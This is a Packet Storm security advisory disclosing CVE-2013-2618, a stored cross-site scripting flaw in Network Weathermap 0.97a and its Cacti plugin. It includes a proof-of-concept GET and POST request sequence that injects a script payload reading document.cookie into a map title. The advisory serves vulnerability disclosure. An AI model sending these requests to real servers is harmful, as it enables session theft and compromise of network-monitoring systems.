exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Network Weathermap 0.97a Cross Site Scripting

Network Weathermap 0.97a Cross Site Scripting
Posted Apr 1, 2013
Authored by Daniel Ricardo dos Santos

Network Weathermap version 0.97a suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2013-2618
SHA-256 | 9a671f005f7a3dff3254c803710370f5bcb545dfafa7a6e10e2984207f901161

Network Weathermap 0.97a Cross Site Scripting

Change Mirror Download
Network Weathermap 0.97a - Persistent XSS
Earlier versions are also possibly vulnerable.

INFORMATION

Product: Network Weathermap 0.97a
Remote-exploit: yes
Vendor-URL: http://www.network-weathermap.com/

Discovered by: Daniel Ricardo dos Santos
CVE Request - 15/03/2013
CVE Assign - 18/03/2013
CVE Number - CVE-2013-2618
Vendor notification - 18/03/2013
Vendor reply - No reply
Public disclosure - 01/04/2013

OVERVIEW

Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying
available files.

INTRODUCTION

Network Weathermap is a network visualisation tool, to take data you
already have and show you an overview of your network in map form.
Support is built in for RRD, MRTG (RRD and old log-format), and
tab-delimited text files. Other sources are via plugins or external scripts.

VULNERABILITY DESCRIPTION

The vulnerability happens when a user injects HTML and Javascript into the
title of a map in editor.php. This title is later shown to the user when
listing the files in editor.php?action=newfile

Besides the title, other fields also allow an attacker to upload malicious
PHP code to a webserver, which can later be executed if the attacker has
direct acess to that file.

This application is often used as a plugin for Cacti. The vulnerability can
be exploited in this mode as well, in
weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and
it can be used to exploit Cacti.

To test it, simply create a map or edit an existing one:
GET editor.php?mapname=test&action=newmap

Then edit the map title with the payload:
POST editor.php
plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO

Then display the titles:
GET editor.php

VERSIONS AFFECTED

Tested with version 0.97a (current release) but earlier versions are
possibly vulnerable.

SOLUTION

There is no official patch currently available.

NOTES

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2013-2618 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

CREDITS

Daniel Ricardo dos Santos
SEC+ Information Security Company - http://www.secplus.com.br/
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close